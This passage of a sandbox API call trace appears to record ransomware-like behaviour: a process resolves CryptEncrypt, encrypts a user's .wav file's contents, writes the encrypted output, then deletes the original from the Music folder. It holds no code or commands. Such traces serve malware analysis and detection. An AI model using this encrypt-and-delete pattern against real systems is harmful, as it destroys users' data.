lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0111.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.294] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0111.294] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e25e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0111.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.296] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.296] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.296] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0111.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0111.297] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.298] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x9fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xa00) returned 1 [0111.298] CharLowerBuffW (in: lpsz="byte[2561]", cchLength=0xa | out: lpsz="byte[2561]") returned 0xa [0111.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.298] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43fc8b0*, pdwDataLen=0x144e790*=0x9fc, dwBufLen=0xa00 | out: pbData=0x43fc8b0*, pdwDataLen=0x144e790*=0xa00) returned 1 [0111.345] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.345] WriteFile (in: hFile=0x258, lpBuffer=0x43faa98*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43faa98*, lpNumberOfBytesWritten=0x144f194*=0xa00, lpOverlapped=0x0) returned 1 [0111.346] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0111.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.346] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0111.346] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.346] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.347] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.347] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.347] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0111.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.347] FreeLibrary (hLibModule=0x756e0000) returned 1 [0111.347] CloseHandle (hObject=0x298) returned 1 [0111.347] CloseHandle (hObject=0x258) returned 1 [0111.349] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\xJgB9.wav", lpFilePart=0x0) returned 0x1f [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0111.349] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav" (normalized: "c:\\users\\fd1hvy\\music\\xjgb9.wav")) returned 0x20 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0111.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0111.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0111.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4bcbc30, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x7503b690, ftLastAccessTime.dwHighDateTime=0x1d5e1dc, ftLastWriteTime.dwLowDateTime=0x7503b690, ftLastWriteTime.dwHighDateTime=0x1d5e1dc, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xJgB9.wav", cAlternateFileName="")) returned 0x41ac600 [0111.350] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav" (normalized: "c:\\users\\fd1hvy\\music\\xjgb9.wav")) returned 1 [0111.398] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4bcbc30, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x7503b690, ftLastAccessTime.dwHighDateTime=0x1d5e1dc, ftLastWriteTime.dwLowDateTime=0x7503b690, ftLastWriteTime.dwHighDateTime=0x1d5e1dc, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xJgB9.wav", cAlternateFileName="")) returned 0 [0111.398] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 